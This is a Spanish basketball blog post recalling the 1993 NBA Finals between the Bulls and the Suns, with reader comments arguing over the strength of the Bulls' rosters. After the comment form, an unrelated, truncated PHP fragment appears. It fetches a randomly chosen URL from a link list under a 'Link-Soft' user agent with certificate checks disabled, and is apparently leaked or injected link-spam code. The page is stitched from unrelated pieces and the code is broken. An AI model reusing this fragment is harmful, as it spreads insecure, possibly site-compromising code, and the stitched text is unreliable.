No apostarás contra un dios

24 de November de 2011 por TheDeerHunter

Hoy traemos una nueva entrega de nuestra particular selección de partidos históricos. En este caso os confesaré que se trata de uno de los disgustos más grandes que me he llevado como aficionado a la NBA.

Corría 1993, una época en la que todo el mundo se subía al carro de los Chicago Bulls y Michael Jordan. Para un fiel aficionado Laker y fanático de Magic Johnson era un momento duro. Finalizada una época tan inmensamente gloriosa para los amarillos, de alguna forma hería nuestro orgullo esa actitud (a mis ojos insolente) de “nuevos ricos” de la franquicia de Illinois. Los Bulls sumaban ya un “repeat”, incluído un anillo frente a los Lakers, y 3 MVPs para Jordan. No le hacía, desde mi punto de vista, más simpática la figura del #23 el hecho de que ya se hablara sin tapujos de que era el mejor de la historia. Eso para mí era un sacrilegio frente a mi siempre idolatrado #32.

Agravaba la situación el hecho de que mi propio cuñado era uno de esos “nuevos aficionados de medio pelo” que en ese momento tanto me cargaban. Y él aprovechaba el momento vacilándome todo lo que podía con el tema con el único propósito de tocar las narices. Ya se había convertido en una tradición una apuesta a final de curso… Como podéis imaginar yo ya llevaba perdidas 2 consecutivas con la consiguiente frustración acumulada.

Sobra decir que trascurridos casi 20 años desde entonces ya no lo veo de la misma manera tan pasional. Aquellos Bulls molaban. Y molaban más si cabe porque a diferencia del segundo threepeat no habían juntado una plantilla tan “abusona”. Pero es que en ese momento también venían pegando fuerte los Suns de Sir Charles Barkley, que también molaban lo suyo. Molaba la franquicia, la equipación (sobretodo la de visitante), el juego vistoso de Westphal, la plantilla con Dan Majerle, Kevin Johnson, Tom Chambers, el entrañable Oliver Miller… Pero sobre todas las cosas molaba la versión más demoledora que jamás hayamos visto de “El Gordo”.

Eso sí… Ainge no molaba tanto. Al menos a mí.

Barkley había aterrizado en los Suns con todo el hambre del mundo ese año:

 – “Me subí en el avión y pedí una bebida. Estaba eufórico y le dije a la azafata: “Invite a todo el mundo, acabo de ser traspasado.” Lo mejor de todo es que al final no pagué esa ronda.” – Barkley cuando se enteró de que había sido traspasado a los Phoenix Suns.

 En modo berserker (25.6 puntos, 12.2 rebotes, 5.1 asistencias, 1.6 robos y 1 tapón), Barkley llevó a los suyos a las 62 victorias y al primer puesto de la regular negándole el MVP a Jordan. Los Bulls tenían ciertas dificultades en mantener la motivación adecuada tras dos anillos y se habían quedado “tan sólo” en 57 victorias perdiendo el factor cancha tanto contra los Knicks como contra los propios Suns que a la postre serían sus rivales en la lucha por conseguir el anillo.

Pero tras empezar a remolque en las finales del Este, los hombres de Phil Jackson se pusieron las pilas y cerraron aquella serie con 4 triunfos consecutivos. Y en la finalísima mantuvieron el nivel abriendo la eliminatoria frente Phoenix con 2 sólidas victorias a domicilio.

Pero no se puede subestimar la mezcla de sobre-motivación y locura, la definición más exacta de Charles Barkley en aquel momento. Así que El Gordo logró lo que pocos humanos podían soñar entonces: Doblegar dos veces a Jordan delante de su público: 24 puntos, 19 rebotes, 4 asistencias el 13 de junio del 93 y 24-6-6 cuatro noches más tarde. La serie debía regresar a Phoenix y Barkley afirmaba, completamente desatado, esto:

“God wants us to win the championship. I told Michael Jordan the other day that it was destiny for us to win.”

Si hubiera sido cierto que Dios quería que los Suns ganaran aquel anillo se puede decir que aquella noche Michael Jordan y John Paxson impusieron su voluntad a la de Dios. Los Suns tuvieron a los campeones contra las cuerdas y estuvo en su mano asegurar el 7º. A Kevin Johnson y Dan Majerlee se les encogió el brazo en dos tiros abiertos. Todo lo contrario que le ocurrió a Paxson en aquel lanzamiento mítico, para mi propia ruina. Cuantas veces llegaría a repasar esa jugada en sueños… o en pesadillas. Eso sí, aprendí la lección definitivamente.

Éste es el boxscore de aquel impresionante partido y aquí podéis ver los primeros minutos. Encontrar en Youtube el resto os será muy sencillo.

Comenta

19 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    uf, esta serie es de lo mejorcito que recuerdo, 2 de mis ídolos frente a frente ( por cierto, me jode muy mucho que Chuck no aparezca en el 2k12). Creo que es una de las RS más dominantes que se haya visto “recientemente” y nunca dejaré de asombrarme de la capacidad reboteadora de semejante “vaca enana voladora”, en palabras de mi tío.
    En mi 11 de la historia la única posiciónque tengo duplicada es la de 4, elegir entre Duncan y Barkley es como elegir entre papá y mamá.

    Y, por supuesto, tengo la camiseta visitante de los Suns en mi armario. Imprescindible

      Citar

  2. Esteban dice:
    #2

    jordan es algo q nunca se volvera a ver, la otra noche me puse a ver el 7mo partido frente a los pacers en el 97
    los pacers contaban con un equipito, mark jakcson, REGGIE MILLER, cris mullin, dale davis y rick smith, sumados a travis best, jalen rose y antonio davis

    uno de los mejores equipos no campeon, puso contra las cuerdas a jordan, pero en ese partido se pudo ver lo mejor de un jugador, la calidad inconmensurable en ataque, pero una devocion por la victoria nunca vista, increible ver a jordan con su metro 98, bajando rebotes ofensivos frente a 4 pacers, liquidando de triples, o con sus 34 años, metiendo volcadas contra la marca y festejandolas como un rookie

    no solo la calidad, sino el espiruto ganador de jorden lo ponen en un nivel superior a una jugador de basquet

      Citar

  3. TheDeerHunter dice:
    #3

      Citar

  4. Viva_Dirk dice:
    #4

    Que grandísima final, con un Barkley bestial rodeado de un equipo de mucho talento, otro mas que fue a aparecer en la época de Jordan y sucumbió.

    En otro momento habria que discutir eso del equipo abusón del segundo threepeat, igual no lo recuerdo bien y Jordan jugaba con Karl Malone y Olajuwon.

      Citar

  5. TheDeerHunter dice:
    #5

    Viva_Dirk:

    En otro momento habria que discutir eso del equipo abusón del segundo threepeat, igual no lo recuerdo bien y Jordan jugaba con Karl Malone y Olajuwon.

    Jugaba junto a Pippen, Rodman, Kukoc, Ron Harper, Kerr… eso para mí es abusar.

      Citar

  6. HisRoyalAirness dice:
    #6

    TheDeerHunter:
    kevin johnson: http://www.youtube.com/watch?v=oVcSndz52DE

    peeero: http://www.youtube.com/watch?v=aS25dibHOR0

    jojojo no me acordaba de esto…

    I love this game!

      Citar

  7. Viva_Dirk dice:
    #7

    De esos que nombras hay 4 que se solapaban posiciones.

    Eran un equipazo pero de ninguna manera mucho mejores que, Stockton-Hornacek-Russell-Malone eran todos titulares y podian jugar a la vez, igual que Payton-Hawkins-Schrempf-Kemp-Perkins, Hardaway-Anderson-Scott-Grant-Shaq, Hardaway-Lenard-Majerle-PJ Brown-Mourning, con Mashburn de suplente.

    Vamos, que unos tenian a Jordan y otros no lo tenian. Me gustaría saber cuantos equipos campeones han tenido una menor producción ofensiva de su juego interior que los Bulls de Michael.

      Citar

  8. Pop dice:
    #8

    Jolin, vaya jugadita de Pippen en el 2:20. Lo firmaba el mismo Lebron… Qué grande era, qué empequeñecido parece a veces…

      Citar

  9. Esteban dice:
    #9

    lo que q los bulls tenian un equipo abusador en la segunda tricampeonato, no lo comparto en absoluto

    rodman, rebotes y nada mas, longley lo demostro luego de los bulls, en los suns q no servia de nada, pippen enorme jugador, pero nunca un primer espada, ni antes del sgundo tri ni desp con los blazers ni con los rockets

    harper, a es aaltura de su carrera solo un buen jugador, kerr nu mucho mas

    quiz tony y pippen y no mas que eso

    cuantos all stars tenia ese equipo? vamos no tenian nada, solo jordan

      Citar

  10. TheDeerHunter dice:
    #10

    Obviamente cuando digo abusón incluyo a Jordan… pero infravalorar todo lo excelso que tenía alrededor con el único propósito de hacerle de más a él es una de las injusticias históricas de esta liga.
    Pippen y Rodman eran all-stars y jugadores de época (Pippen es un top10 de aleros de todos los tiempos y Rodman seguro se acerca a un top 15 en su posición) Kukoc también me parece un jugador único (y de época para su perfil y rol) y a Harper los que le disfrutamos en los Lakers como a Kerr los le disfrutaron en los Spurs sabemos la importancia que pueden tener. Además de su inmenso talento individual son jugadores de rol inmejorables, como parece que sólo sabe apreciar gente como Phil Jackson (y así le ha ido) De otra forma difícilmente se hubieran logrado tales resultados alrededor de uno solo.

    Con distinto perfil de jugadores jamás de la vida hubieras podido jugar simultáneamente con Harper-Jordan-Pippen-Kukoc y Rodman como sí lo podía hacer Phil Jackson.
    Y no digo yo, sino que está universalmente considerado y así también lo demuestran los hechos de que se trata del mejor equipo de la historia. Comparar las otras plantillas me parece una broma de mal gusto.

    Pero vamos… si de lo que se trata es atribuirle ciegamente a Jordan los méritos que tenía y también los que no tenía no nos cortemos un duro.

      Citar

  11. Viva_Dirk dice:
    #11

    Ni de lejos es la mejor plantilla de la historia, pero ni con mucho. Que tuvieran que jugar con ese quinteto que nombras demuestra una vez mas la falta de poderío interior.

    De Pippen yo no he dicho nada, para mi era perfecto en su papel, sin duda el mejor escudero de la historia y por ahí si ganaba Jordan algo de ventaja a sus rivales. Las plantillas que nombro eran tan potentes como las de los Bulls, si cambiasemos en cada una al jugador franquicia de sitio estoy seguro de que Chicago tendria algunos anillos menos.

    Y te vuelvo a desafiar, vil vellaco, a que encuentres campeones con menor producción ofensiva del juego interior.

      Citar

  12. TheDeerHunter dice:
    #12

    Pero a mí la producción ofensiva interior me deja frío. No tiene porqué ser un modelo indiscutible si por fuera andaban sobrados. Además, que de producción ofensiva Pippen o Kukoc como falsos interiores andaban sobradísimos. Eran otros tiempos.

    La lectura que “tenían” que jugar con ese juego interior es parcial. Longley cumplió siempre… lo mismo que Wennington, Salley o cualquier leñero que se sacaba de la manga Phil. Pero la clave de jugar con ellos o sin ellos seguía siendo Rodman que vuelvo a insistir ha sido una puñetera anomalía en la historia por rebotes y defensa. Y eso es exáctamente lo que le hacía falta a ese equipo… no estoy seguro si tanto un interior anotador les hubiera dado más. Más malos rollos posiblemente, que no es lo mismo. Lo único cierto y si quieres me corriges tú es que ese equipo no sufrió tanto como cabría pensar frente a los interiores más potentes. Si acaso al contrario… que se lo digan a Malone XD

    Además, te recuerdo que en esa época había defensa individual rabiosa y Jordan o Pippen tenían mayor facilidad que ahora para llevar a sus pares al poste mediante recursos tácticos bastante sencillos. Sin contar con que Kevin Johnson, Starks, Craig Ehlo, Hornacek, Hersey Hawkins… ese era el tipo de perros de presa y titanes físicos en la posición de 2 con los que se solía topar MJ. :S En estas circunstancias tener un juego interior demoledor no era tan imprescindible.

    Por supuesto que ese quinteto: Harper-Jordan-Pippen-Kukoc-Rodman lo hace tan sumamente potente MJ y sin él claro que no hubieran ganado tantos anillos (sobre todo de haberlo tenido en frente)… pero el juntarle precisamente a los otros para mí es un pasote imposible de igualar. En mi opinión ni empapados en crack lo hacen los otros equipos que habías nombrado.

      Citar

  13. Viva_Dirk dice:
    #13

    Como tantas veces la verdad es que no estamos tan lejos.

    Yo si creo que los interiores les hacian daño, el año de la final de Seattle vimos a Kemp salirse con promedios de 23.3 puntos y 10 rebotes. A Malone si le pillaba bien el punto Rodman, aunque mas o menos hacía sus números el cartero.

    De los equipos que yo he nombrado, si cambiamos al jugador franquicia Jordan habria ganado algun anillo fijo. La suma de aquel todo era un pasote como tu bien dices, pero como plantilla yo diria que entra en el top5 de la historia, claramente por detras de los Celtics de los 60, el Showtime y los Celtics de Bird, luego entre el 4 y el 8 creo que habria discusiones y todos tendriamos nuestra parte de razón.

      Citar

  14. TheDeerHunter dice:
    #14

    Abusar para mí es a un equipo tri-campeón cambiar (a grandes rasgos) a 1) Horace por Rodman, por muy bueno que era Horace; 2) Stacey King por Kukoc; 3) Armstrong&Paxson por Harper&Kerr; 4) Perdue o Cartwright por Luc
    Creo que es fácil de entender.

    El hecho que sea considerado el mejor equipo de la historia es por su ratio de victorias y la diferencia demostrada frente a sus rivales. Los últimos 3 equipos que has nombrado serán mejores plantillas (y también hablaríamos de abusar si no fuera por lo que también había alrededor) pero no estoy tan seguro que pudieran doblegar a éste.

    Admito que no es una cuestión evidente… y por supuesto que la diferencia la marca Jordan, pero sin cualquiera de los Pippen, Rodman y Kukoc ni siquiera podríamos imaginar debate.
    Y estamos comparándolo con auténticos bichos de equipos…

      Citar

  15. Melo15 dice:
    #15

    I despues se quejan de que LeBron no a ganao anillos con el equipo tan asqueroso que tenia

      Citar

  16. HisRoyalAirness dice:
    #16

    Estoy con Deer en que el equipo del segundo three-peat era un abuso pero, en mi opinión, por diferentes motivos a los suyos. Creo que se juntaron los 3 mejores defensores individuales de la historia (puede que os parezca una afirmación exagerada), no por ser los que mejor defendiesen sino porque además tenían otras muchas cualidades excelentes. Ha habido defensores a lo largo de la historia espectaculares pero ninguno, al margen de la defensa hacía los números de ninguno de estos 3 angelitos ( hablo desde los 80, no me saqueis a Chamberlain o a Russell, por favor). Es más, el año del record de victorias Jordan, Pippen y Rodman estuvieron en el mejor quinteto defensivo.
    También me parece evidente que el factor diferencial y el salto de calidad definitivo lo daba MJ pero vamos, sin novedad en el frente, es como decir que en los Celtics de los 80 lo daba Larry Bird. Pues claro.
    Estoy absolutamente en contra de endiosar a Michael menospreciando a su rooster es más, no le hace falta. Para mí Pippen es top 5 de aleros de la historia, aún hace poco volví a ver el séptimo partido Blazers-Lakers del 2000 y me deja alucinado. Sacando faltas en ataque como churros, reboteando, haciendo ayudas perfectas y corriendo y saltando como un galgo. Y Rodman a muchos se le olvida que antes de llegar a los Bulls llevaba ya 2 anillos.

      Citar

  17. Viva_Dirk dice:
    #17

    A mi no se me olvida que Rodman habia ganado 2 anillos, pero a vosotros si parece que se os olvida que era un especialista, un superespecialista si pero no mas que eso.

    Yo tampoco creo que ninguno de los equipos que he nombrado doblegara a ese, si algo les faltaba a aquellos equipos era poder para a Mike, y además creo que la defensa de perimetro que hacian esos Bulls era realmente bestial.

    @HisRoyal, si que el factor diferencial era Bird en aquellos Celtics, pero si hubieramos cambiado a Bird por alguno de los otros jugadores franquicias, ¿habria seguido Bird ganando anillos? Esos Celtics que también eran un pasote ¿podrian haber ganado títulos con el Dr.J o English en lugar del Bird y jugando Bird en Phily/Denver? Yo creo que si, y ahí la diferencia que yo observo con respecto a los Bulls de Jordan.

      Citar

  18. HisRoyalAirness dice:
    #18

    No me refería a que te olvidases tú, eh Viva? Lo dije en plan comentario general.
    Yo creo que cada equipo está hecho a medida de su estrella y dudo que unos encajasen en el equipo de otro. Jordan sí pero porque no había dios que lo parase.

      Citar

  19. Viru dice:
    #19

    Yo les tenía rabia a Jordan y los Bulls por lo mismo, por ese “subirse al carro” de la gente que pasaba del tema. Como me gustaban aquellos Suns y que pena me dio verles perder.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>